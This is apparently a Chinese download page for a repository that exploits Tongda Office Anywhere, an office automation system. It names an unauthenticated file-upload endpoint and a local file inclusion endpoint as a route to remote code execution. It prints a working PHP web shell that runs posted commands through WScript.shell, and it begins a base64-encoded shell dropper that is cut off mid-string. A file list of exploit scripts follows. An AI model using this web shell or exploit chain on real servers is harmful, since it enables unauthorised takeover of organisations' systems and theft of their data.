OA tongda RCE:Office Anywhere网络智能办公系统 源码
OA-通达-RCE | Office Anywhere网络智能办公系统 后台Getshell 无需身份认证 任意文件上传防御/ispirit/im/upload.php 本地文件包含漏洞/ispirit/interface/gateway.php 命令执行绕过: <?php $command=$_POST['cmd']; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> GetWebshell <?php $fp = fopen('readme.php', 'w'); $a = base64_decode("PD9waHAKQGV
文件列表
OA-tongda-RCE-master.zip
(预估有个11文件)
OA-tongda-RCE-master
tongda.gif
537KB
Auth-Getshell.gif
3.89MB
gateway.jpg
51KB
tongda
decode
upload-fix.php
2KB
upload.php
5KB
gateway.php
1KB
upload.php
6KB
暂无评论